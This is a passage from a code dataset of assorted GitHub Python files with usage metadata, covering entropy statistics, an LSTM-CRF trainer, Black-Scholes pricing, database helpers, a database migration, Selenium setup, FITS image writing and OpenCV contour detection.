"torch.tensor", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.sort", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.fliplr", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "3492519750", "text": "\"\"\"Entropy related functions.\"\"\"\n\nfrom collections import Counter\nfrom collections.abc import Sequence\nimport math\nfrom typing import TypeVar\n\nT = TypeVar(\"T\")\n\n\ndef shannon_entropy(ciphertext: Sequence[T], base: int = 2) -> float:\n \"\"\"Shannon entropy. by default in bits.\"\"\"\n f = Counter(ciphertext)\n N = len(ciphertext)\n H: float = 0.0\n for v in f.values():\n H = H - v / N * math.log(v / N, base)\n print(f\"Shannon Entropy = {H:.3f} bits (size={N})\")\n return H\n\n\ndef shannon2_entropy(ciphertext: Sequence[T], base: int = 2, cut: int = 0) -> float:\n \"\"\"Shannon entropy. by default in bits.\"\"\"\n N = len(ciphertext)\n if N < 3:\n return 0.0\n l: list[tuple[T, ...]] = []\n if cut == 0:\n for i in range(0, N - 1):\n l.append((ciphertext[i], ciphertext[i + 1]))\n elif cut in (1, 2):\n for i in range(cut - 1, N - 1, 2):\n l.append((ciphertext[i], ciphertext[i + 1]))\n else:\n raise Exception\n f = Counter(l)\n H: float = 0.0\n for v in f.values():\n H = H - v / N * math.log(v / N, base)\n print(f\"S = {H:.3f} bits (size={N})\")\n return H\n", "repo_name": "micheloosterhof/aldegonde", "sub_path": "src/aldegonde/stats/entropy.py", "file_name": "entropy.py", "file_ext": "py", "file_size_in_byte": 1143, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypeVar", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.abc.Sequence", "line_number": 11, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 13, "usage_type": "call"}, {"api_name": "math.log", "line_number": 17, "usage_type": "call"}, {"api_name": "collections.abc.Sequence", "line_number": 22, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 36, "usage_type": "call"}, {"api_name": "math.log", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "10424604107", "text": "#coding: utf-8\nfrom __future__ import print_function\n\n# the yaml load to dict construct\nimport yaml\nimport pickle\nfrom load_data import load_vecs, init_data\nfrom model import SequenceLabelModel\n\ndef main():\n\n yaml_path = \"local_used_lstm_crf/new_config.yml\"\n with open(yaml_path, \"r\") as f:\n config = yaml.load(f)\n\n # return in the first loop\n #return\n \n feature_names = config[\"model_params\"][\"feature_names\"]\n \n feature_weight_shape_dict, feature_weight_dropout_dict, feature_init_weight_dict = dict(), dict(), dict()\n for feature_name in feature_names:\n feature_weight_shape_dict[feature_name] = config[\"model_params\"][\"embed_params\"][feature_name][\"shape\"]\n feature_weight_dropout_dict[feature_name] = config[\"model_params\"][\"embed_params\"][feature_name][\"dropout_rate\"]\n \n path_pre_train = config[\"model_params\"][\"embed_params\"][feature_name][\"path\"]\n #path_pre_train = \"\"\n if path_pre_train:\n with open(path_pre_train, \"rb\") as f:\n feature_init_weight_dict[feature_name] = pickle.load(f)\n \n # load vecs\n path_vocs = []\n for feature_name in feature_names:\n path_vocs.append(config[\"data_params\"][\"voc_params\"][feature_name][\"path\"])\n path_vocs.append(config[\"data_params\"][\"voc_params\"][\"label\"][\"path\"])\n vocs = load_vecs(path_vocs)\n \n # load train data\n sep_str = config[\"data_params\"][\"sep\"]\n assert sep_str in [\"table\", \"space\"]\n sep = \"\\t\" if sep_str == \"table\" else ' '\n data_dict = init_data(\n path = config[\"data_params\"][\"path_train\"],\n feature_names = feature_names,\n sep = sep,\n vocs = vocs,\n max_len= config[\"model_params\"][\"sequence_length\"],\n model = \"train\"\n )\n \n \n model = SequenceLabelModel(\n sequence_length=config[\"model_params\"][\"sequence_length\"],\n nb_classes=config[\"model_params\"][\"nb_classes\"],\n nb_hidden = config[\"model_params\"][\"bilstm_params\"][\"num_units\"],\n \n feature_weight_shape_dict = feature_weight_shape_dict,\n feature_init_weight_dict = feature_init_weight_dict,\n feature_weight_dropout_dict = feature_weight_dropout_dict,\n \n dropout_rate = config[\"model_params\"][\"dropout_rate\"],\n nb_epoch= config[\"model_params\"][\"nb_epoch\"],\n feature_names = feature_names,\n \n batch_size=config[\"model_params\"][\"batch_size\"],\n train_max_patience = config[\"model_params\"][\"max_patience\"],\n use_crf = config[\"model_params\"][\"use_crf\"],\n l2_rate=config[\"model_params\"][\"l2_rate\"],\n rnn_unit = config[\"model_params\"][\"rnn_unit\"],\n learning_rate= config[\"model_params\"][\"learning_rate\"],\n clip = config[\"model_params\"][\"clip\"],\n path_model= config[\"model_params\"][\"path_model\"]\n )\n \n model.fit(\n data_dict= data_dict, dev_size=config[\"model_params\"][\"dev_size\"]\n )\n\n\nif __name__ == \"__main__\":\n main()", "repo_name": "tingxiatian/LinuxVersionLSTM", "sub_path": "local_used_lstm_crf/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yaml.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 30, "usage_type": "call"}, {"api_name": "load_data.load_vecs", "line_number": 37, "usage_type": "call"}, {"api_name": "load_data.init_data", "line_number": 43, "usage_type": "call"}, {"api_name": "model.SequenceLabelModel", "line_number": 53, "usage_type": "call"}, {"api_name": "model.fit", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "18379595761", "text": "import pandas_datareader as pdr\nfrom pandas_datareader import data, wb\nfrom datetime import date\nimport numpy as np\nimport pandas as pd\nfrom scipy import log,exp,sqrt,stats\n\ndef blackscholes_call(S,E,T,rf,sigma):\n\t#first we have to calculate d1 and d2 parameters\n\td1=(log(S/E)+(rf+sigma*sigma/2.0)*T)/(sigma*sqrt(T))\n\td2 = d1-sigma*sqrt(T)\n\tprint(d1)\n\tprint(d2)\n\t#we need N(x) normal distribution function\n\treturn S*stats.norm.cdf(d1)-E*exp(-rf*T)*stats.norm.cdf(d2)\n\ndef blackscholes_put(S,E,T,rf,sigma):\n\t#first we have to calculate d1 and d2 parameters\n\td1=(log(S/E)+(rf+sigma*sigma/2.0)*T)/(sigma*sqrt(T))\n\td2 = d1-sigma*sqrt(T)\n\t#we need N(x) normal distribution function\n\treturn -S*stats.norm.cdf(-d1)+E*exp(-rf*T)*stats.norm.cdf(-d2)\n\t\nif __name__ == \"__main__\":\n\t\n\tS0=100 #underlying stock price at t=0\n\tE=100\t\t#strike price\n\tT = 1\t\t#expiry 1=1year=365days\n\trf = 0.05 \t#risk-free rate\n\tsigma=0.2\t#volatility of the underlying stock\n\t\n\tprint(\"Call option price according to Black-Scholes model: \",blackscholes_call(S0,E,T,rf,sigma))\n\tprint(\"Put option price according to Black-Scholes model: \",blackscholes_put(S0,E,T,rf,sigma))", "repo_name": "johnmihalik/quant-finance", "sub_path": "original/blackscholes.py", "file_name": "blackscholes.py", "file_ext": "py", "file_size_in_byte": 1140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scipy.log", "line_number": 10, "usage_type": "call"}, {"api_name": "scipy.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "scipy.sqrt", "line_number": 11, "usage_type": "call"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 15, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 15, "usage_type": "name"}, {"api_name": "scipy.exp", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.log", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.sqrt", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 22, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 22, "usage_type": "name"}, {"api_name": "scipy.exp", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "23107405346", "text": "# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom time import strftime\nfrom pyodbc import connect\nfrom config import Config\nimport logger\n\nlog = logger.getLogger()\n\nclass BaseDatos(object):\n \"\"\"Clase de acceso a datos\"\"\"\n\n @classmethod\n def conecta(cls):\n \"\"\"Conecta a la base de datos de pruebas\\nRegresa un objeto con la conexión\"\"\"\n try:\n configuracion = Config.obtiene_config_basedatos()\n conn = connect('driver={%s};server=%s;database=%s;uid=%s;pwd=%s' % configuracion)\n return conn\n except BaseException as ex:\n log.error(\"Error al conectar a base de datos: %s\", ex)\n raise\n \n @classmethod\n def existe_tipo_cambio(cls, moneda, fecha):\n \"\"\"Consulta el tipo de cambio del día en la base de datos\\nRecibe la conexión a BD, la moneda y la fecha a consultar\\nRegresa el número de registros coincidentes\"\"\"\n try:\n conn = cls.conecta()\n cursor = conn.cursor()\n cadena_select = \"\"\"SELECT COUNT(TIPO_CAMBIO_MXN)\n FROM [dbo].[TipoCambioMonedas]\n WHERE CODIGO =? AND FECHA_PUBLICACION =? AND Activo = 1\"\"\"\n params = [moneda, fecha]\n cursor.execute(cadena_select, params)\n result = cursor.fetchone()\n cursor.close()\n conn.close()\n if result == None:\n return 0\n else:\n return result[0]\n except Exception as ex:\n log.error(\"Error al consultar el tipo de cambio en base de datos: %s\", ex)\n raise\n\n @classmethod\n def inserta_tipo_cambio(cls, fecha_publicacion, fecha_aplicacion, tipo_cambio, moneda):\n \"\"\"Inserta el nuevo tipo de cambio del día en la base de datos\\nRecibe la conexión a BD, la fecha, los días de vigencia, el valor del nuevo tipo de cambio y la moneda\\nRegresa el número de registros insertados\"\"\"\n try:\n conn = cls.conecta()\n cursor = conn.cursor()\n cadena_insert = \"\"\"INSERT INTO [dbo].[TipoCambioMonedas]\n (CODIGO, FECHA_PUBLICACION, FECHA_APLICACION, TIPO_CAMBIO_USD, TIPO_CAMBIO_MXN, ACTIVO)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n params = [moneda, fecha_publicacion, fecha_aplicacion, 1, tipo_cambio, 1]\n cursor.execute(cadena_insert, params)\n conn.commit()\n log.info(\"Se inserta el tipo de cambio: Moneda '%s', Tipo de cambio '%s' del día '%s'\", moneda, tipo_cambio, fecha_aplicacion)\n cursor.close()\n conn.close()\n return True\n except Exception as ex:\n log.error(\"Error al insertar el tipo de cambio en base de datos: %s\", ex)\n raise", "repo_name": "edgarjimenezb/DailyCurrencyRateMX", "sub_path": "datos.py", "file_name": "datos.py", "file_ext": "py", "file_size_in_byte": 2771, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logger.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "config.Config.obtiene_config_basedatos", "line_number": 18, "usage_type": "call"}, {"api_name": "config.Config", "line_number": 18, "usage_type": "name"}, {"api_name": "pyodbc.connect", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "14832037209", "text": "#! -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\nfrom scipy.sparse import csr_matrix\nfrom DocumentFeatureSelection.common import data_converter\nfrom DocumentFeatureSelection.common.data_converter import DataCsrMatrix\nfrom DocumentFeatureSelection.tf_idf import tf_idf\nfrom DocumentFeatureSelection.models import ScoredResultObject\nimport logging\nimport unittest\nimport numpy\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n__author__ = 'kensuke-mi'\n\n\nclass TestTfIdf(unittest.TestCase):\n def setUp(self):\n input_dict = {\n \"label_a\": [\n [\"I\", \"aa\", \"aa\", \"aa\", \"aa\", \"aa\"],\n [\"bb\", \"aa\", \"aa\", \"aa\", \"aa\", \"aa\"],\n [\"I\", \"aa\", \"hero\", \"some\", \"ok\", \"aa\"]\n ],\n \"label_b\": [\n [\"bb\", \"bb\", \"bb\"],\n [\"bb\", \"bb\", \"bb\"],\n [\"hero\", \"ok\", \"bb\"],\n [\"hero\", \"cc\", \"bb\"],\n ],\n \"label_c\": [\n [\"cc\", \"cc\", \"cc\"],\n [\"cc\", \"cc\", \"bb\"],\n [\"xx\", \"xx\", \"cc\"],\n [\"aa\", \"xx\", \"cc\"],\n ]\n }\n\n tf_matrix = numpy.array(\n [\n [2, 12, 1, 0, 1, 1, 1, 0],\n [0, 0, 8, 1, 2, 1, 0, 0],\n [0, 1, 1, 7, 0, 0, 0, 3]\n ]\n )\n\n data_csr_matrix = data_converter.DataConverter().convert_multi_docs2document_frequency_matrix(\n labeled_documents=input_dict,\n n_jobs=-1\n )\n assert isinstance(data_csr_matrix, DataCsrMatrix)\n self.label2id_dict = data_csr_matrix.label2id_dict\n self.csr_matrix_ = data_csr_matrix.csr_matrix_\n self.n_docs_distribution = data_csr_matrix.n_docs_distribution\n self.vocabulary = data_csr_matrix.vocabulary\n\n numpy.array_equal(data_csr_matrix.csr_matrix_.toarray(), tf_matrix)\n\n def test_normal_fit_transform(self):\n tf_idf_weighted_matrix = tf_idf.TFIDF().fit_transform(\n X=self.csr_matrix_,\n )\n assert isinstance(tf_idf_weighted_matrix, csr_matrix)\n\n def test_output_result_pmi(self):\n tf_idf_weighted_matrix = tf_idf.TFIDF().fit_transform(\n X=self.csr_matrix_,\n )\n assert isinstance(tf_idf_weighted_matrix, csr_matrix)\n\n tf_idf_scored_dict = ScoredResultObject(\n scored_matrix=tf_idf_weighted_matrix,\n label2id_dict=self.label2id_dict,\n feature2id_dict=self.vocabulary,\n ).convert_score_matrix2score_record(outformat='items')\n self.assertTrue(isinstance(tf_idf_scored_dict, list))\n assert isinstance(tf_idf_scored_dict, list)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n", "repo_name": "Kensuke-Mitsuzawa/DocumentFeatureSelection", "sub_path": "tests/test_tf_idf.py", "file_name": "test_tf_idf.py", "file_ext": "py", "file_size_in_byte": 2853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 14, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.common.data_converter.DataConverter", "line_number": 49, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.common.data_converter", "line_number": 49, "usage_type": "name"}, {"api_name": "DocumentFeatureSelection.common.data_converter.DataCsrMatrix", "line_number": 53, "usage_type": "argument"}, {"api_name": "numpy.array_equal", "line_number": 59, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.tf_idf.tf_idf.TFIDF", "line_number": 62, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.tf_idf.tf_idf", "line_number": 62, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 65, "usage_type": "argument"}, {"api_name": "DocumentFeatureSelection.tf_idf.tf_idf.TFIDF", "line_number": 68, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.tf_idf.tf_idf", "line_number": 68, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 71, "usage_type": "argument"}, {"api_name": "DocumentFeatureSelection.models.ScoredResultObject", "line_number": 73, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "15331155865", "text": "\"\"\"Removing Resource Type from Role object.\nWARNING: upgrading and downgrading is destructive, this will not backfill values.\n\nRevision ID: 83644d6eb47f\nRevises: 1fdcf826e468\nCreate Date: 2020-02-14 06:46:25.725488\n\n\"\"\"\nfrom alembic import op\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Session\nimport sqlalchemy as sa\n\nfrom log import LOG\nfrom web.server.migrations.seed_scripts.seed_83644d6eb47f_remove_resource_type import (\n upvert_data,\n)\n\n# revision identifiers, used by Alembic.\nrevision = '83644d6eb47f'\ndown_revision = '1fdcf826e468'\nbranch_labels = None\ndepends_on = None\n\n\nBase = declarative_base()\n\n\nclass OldRole(Base): # type: ignore\n __tablename__ = 'role'\n\n id = sa.Column(sa.Integer(), primary_key=True)\n name = sa.Column(sa.String(50), nullable=False, server_default='', unique=True)\n label = sa.Column(sa.Unicode(255), server_default='') # for display purposes\n resource_type_id = sa.Column(sa.Integer(), nullable=True)\n\n\n# For downgrade, but assumes that all \"default\" (old) roles still exist\nROLE_ID_NAME_LIST = [\n {'role_name': 'admin', 'resource_type_id': 1},\n {'role_name': 'dashboard_viewer', 'resource_type_id': 2},\n {'role_name': 'dashboard_editor', 'resource_type_id': 2},\n {'role_name': 'dashboard_admin', 'resource_type_id': 2},\n {'role_name': 'directory_reader', 'resource_type_id': 1},\n {'role_name': 'query_runner', 'resource_type_id': 1},\n {'role_name': 'user_admin', 'resource_type_id': 3},\n {'role_name': 'user_moderator', 'resource_type_id': 3},\n {'role_name': 'group_admin', 'resource_type_id': 4},\n {'role_name': 'group_moderator', 'resource_type_id': 4},\n {'role_name': 'query_policy_admin', 'resource_type_id': 5},\n {'role_name': 'query_policy_holder', 'resource_type_id': 5},\n {'role_name': 'query_analyst', 'resource_type_id': 1},\n {'role_name': 'alert_admin', 'resource_type_id': 6},\n {'role_name': 'alert_creator', 'resource_type_id': 6},\n {'role_name': 'alert_editor', 'resource_type_id': 6},\n {'role_name': 'alert_viewer', 'resource_type_id': 6},\n]\n\n\ndef upgrade():\n # NOTE: Not exactly related to this diff but it's easiest to do clean\n # up before resource types disappear.\n upvert_data(op)\n\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('role', schema=None) as batch_op:\n batch_op.drop_constraint('valid_resource_type', type_='foreignkey')\n batch_op.drop_column('resource_type_id')\n\n # ### end Alembic commands ###\n\n\ndef restore_resource_types(alembic_operation):\n bind = alembic_operation.get_bind()\n session = Session(bind=bind)\n\n LOG.info('Restoring resource_types to roles')\n\n for item in ROLE_ID_NAME_LIST:\n role_name = item['role_name']\n resource_type_id = item['resource_type_id']\n entity = session.query(OldRole).filter_by(name=role_name).first()\n if entity:\n entity.resource_type_id = resource_type_id\n\n session.commit()\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('role', schema=None) as batch_op:\n batch_op.add_column(\n sa.Column(\n 'resource_type_id',\n sa.INTEGER(),\n autoincrement=False,\n nullable=False,\n server_default='1',\n )\n )\n batch_op.create_foreign_key(\n 'valid_resource_type',\n 'resource_type',\n ['resource_type_id'],\n ['id'],\n ondelete='RESTRICT',\n )\n\n restore_resource_types(op)\n\n # ### end Alembic commands ###\n", "repo_name": "Zenysis/Harmony", "sub_path": "web/server/migrations/versions/83644d6eb47f_remove_resource_type.py", "file_name": "83644d6eb47f_remove_resource_type.py", "file_ext": "py", "file_size_in_byte": 3682, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.Unicode", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 35, "usage_type": "call"}, {"api_name": "web.server.migrations.seed_scripts.seed_83644d6eb47f_remove_resource_type.upvert_data", "line_number": 63, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 63, "usage_type": "argument"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 66, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 66, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 75, "usage_type": "call"}, {"api_name": "log.LOG.info", "line_number": 77, "usage_type": "call"}, {"api_name": "log.LOG", "line_number": 77, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 91, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 91, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 93, "usage_type": "call"}, {"api_name": "sqlalchemy.INTEGER", "line_number": 95, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 109, "usage_type": "argument"}]} +{"seq_id": "9071431708", "text": "import os\nfrom selenium import webdriver\n\n\nclass WebDriverFactory():\n\n def __init__(self, browser):\n self.browser = browser\n\n def get_web_driver_instance(self, url):\n base_url = url\n if self.browser == \"firefox\":\n driver = webdriver.Firefox()\n elif self.browser == \"chrome\":\n chrome_driver_location = \"/usr/local/bin/chromedriver\"\n os.environ[\"webdriver.chrome.driver\"] = chrome_driver_location\n driver = webdriver.Chrome(chrome_driver_location)\n else:\n driver = webdriver.Firefox()\n driver.implicitly_wait(3)\n driver.get(base_url)\n return driver\n\n", "repo_name": "testingpyt/FPLium-Framework", "sub_path": "base/webdriver_factory.py", "file_name": "webdriver_factory.py", "file_ext": "py", "file_size_in_byte": 665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "16745079040", "text": "import astropy.io.fits as pyfits\nfrom galsim import Image, GalSimIncompatibleValuesError, GalSimValueError\nfrom galsim.fits import _parse_compression, _add_hdu, _write_file\n\n# The below function is copied from galsim.fits, but I've added a header argument\n# to allow saving with a header\n\n\ndef writeMulti(image_list, file_name=None, dir=None, hdu_list=None, clobber=True,\n compression='auto', header_list=None):\n \"\"\"Write a Python list of images to a multi-extension FITS file.\n The details of how the images are written to file depends on the arguments.\n @param image_list A Python list of Images. (For convenience, some items in this list\n may be HDUs already. Any Images will be converted into pyfits HDUs.)\n @param file_name The name of the file to write to. [Either `file_name` or `hdu_list` is\n required.]\n @param dir Optionally a directory name can be provided if `file_name` does not\n already include it. [default: None]\n @param hdu_list A pyfits HDUList. If this is provided instead of `file_name`, then the\n image is appended to the end of the HDUList as a new HDU. In that case,\n the user is responsible for calling either `hdu_list.writeto(...)` or\n `galsim.fits.writeFile(...)` afterwards. [Either `file_name` or `hdu_list`\n is required.]\n @param clobber See documentation for this parameter on the galsim.fits.write() method.\n @param compression See documentation for this parameter on the galsim.fits.write() method.\n @param header_list List of fits headers (one for each image)\n \"\"\"\n\n if any(image.iscomplex for image in image_list if isinstance(image, Image)):\n raise GalSimValueError(\"Cannot write complex Images to a fits file. \"\n \"Write image.real and image.imag separately.\", image_list)\n\n file_compress, pyfits_compress = _parse_compression(compression, file_name)\n\n if file_name and hdu_list is not None:\n raise GalSimIncompatibleValuesError(\n \"Cannot provide both file_name and hdu_list\", file_name=file_name, hdu_list=hdu_list)\n if not (file_name or hdu_list is not None):\n raise GalSimIncompatibleValuesError(\n \"Must provide either file_name or hdu_list\", file_name=file_name, hdu_list=hdu_list)\n\n if hdu_list is None:\n hdu_list = pyfits.HDUList()\n\n for i, image in enumerate(image_list):\n if isinstance(image, Image):\n hdu = _add_hdu(hdu_list, image.array, pyfits_compress)\n if image.wcs:\n image.wcs.writeToFitsHeader(hdu.header, image.bounds)\n if header_list is not None:\n hdu.header.extend(header_list[i])\n else:\n # Assume that image is really an HDU. If not, this should give a reasonable error\n # message. (The base type of HDUs vary among versions of pyfits, so it's hard to\n # check explicitly with an isinstance call. For newer pyfits versions, it is\n # pyfits.hdu.base.ExtensionHDU, but not in older versions.)\n hdu_list.append(image)\n\n if file_name:\n _write_file(file_name, dir, hdu_list, clobber, file_compress, pyfits_compress)\n", "repo_name": "des-science/eastlake", "sub_path": "eastlake/fits.py", "file_name": "fits.py", "file_ext": "py", "file_size_in_byte": 3344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "galsim.Image", "line_number": 29, "usage_type": "argument"}, {"api_name": "galsim.GalSimValueError", "line_number": 30, "usage_type": "call"}, {"api_name": "galsim.fits._parse_compression", "line_number": 33, "usage_type": "call"}, {"api_name": "galsim.GalSimIncompatibleValuesError", "line_number": 36, "usage_type": "call"}, {"api_name": "galsim.GalSimIncompatibleValuesError", "line_number": 39, "usage_type": "call"}, {"api_name": "astropy.io.fits.HDUList", "line_number": 43, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 43, "usage_type": "name"}, {"api_name": "galsim.Image", "line_number": 46, "usage_type": "argument"}, {"api_name": "galsim.fits._add_hdu", "line_number": 47, "usage_type": "call"}, {"api_name": "galsim.fits._write_file", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "40771341453", "text": "import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\no = cv2.imread('sample1.jpg')\nim_grey = cv2.cvtColor(o, cv2.COLOR_BGR2GRAY) # 灰階影像\nt, binary_img = cv2.threshold(im_grey, 140, 255, cv2.THRESH_BINARY_INV)\ncontours, hierarchy = cv2.findContours(binary_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\ncv2.drawContours(o, contours, -1, (0, 0, 255), 5)\nplt.subplot(1,2,1), plt.imshow(im_grey, cmap='gray')\nplt.title('original gray image')\nplt.subplot(1,2,2), plt.imshow(o, cmap='gray')\nplt.title('find contour result')\nplt.show()", "repo_name": "RealJackYeh/drmaster_iot_master", "sub_path": "2-13/sample1_contours1.py", "file_name": "sample1_contours1.py", "file_ext": "py", "file_size_in_byte": 546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 5, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 6, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "34405480487", "text": "from sklearn.cluster import MiniBatchKMeans\nfrom sklearn.cluster import KMeans\nimport numpy as np\nfrom scipy.sparse import issparse\n\ndef cast_to_float32(X):\n if issparse(X):\n X.data = np.float32(X.data)\n else:\n X = np.float32(X)\n return X\n\ndef get_kmeans(cluster_parm):\n if cluster_parm[\"method\"] == \"mini-batch\":\n kmeans = MiniBatchKMeans(n_clusters=cluster_parm[\"n_clusters\"],\n max_iter=cluster_parm[\"max_iter\"],\n batch_size=cluster_parm[\"batch_size\"])\n else:\n kmeans = KMeans(n_clusters=cluster_parm[\"n_clusters\"],\n max_iter=cluster_parm[\"max_iter\"])\n return kmeans\n\ndef convert(input):\n if isinstance(input, dict):\n return {convert(key): convert(value) for key, value in input.iteritems()}\n elif isinstance(input, list):\n return [convert(element) for element in input]\n elif isinstance(input, unicode):\n return input.encode('utf-8')\n else:\n return input\n", "repo_name": "queqichao/FredholmLearning", "sub_path": "util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 967, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": 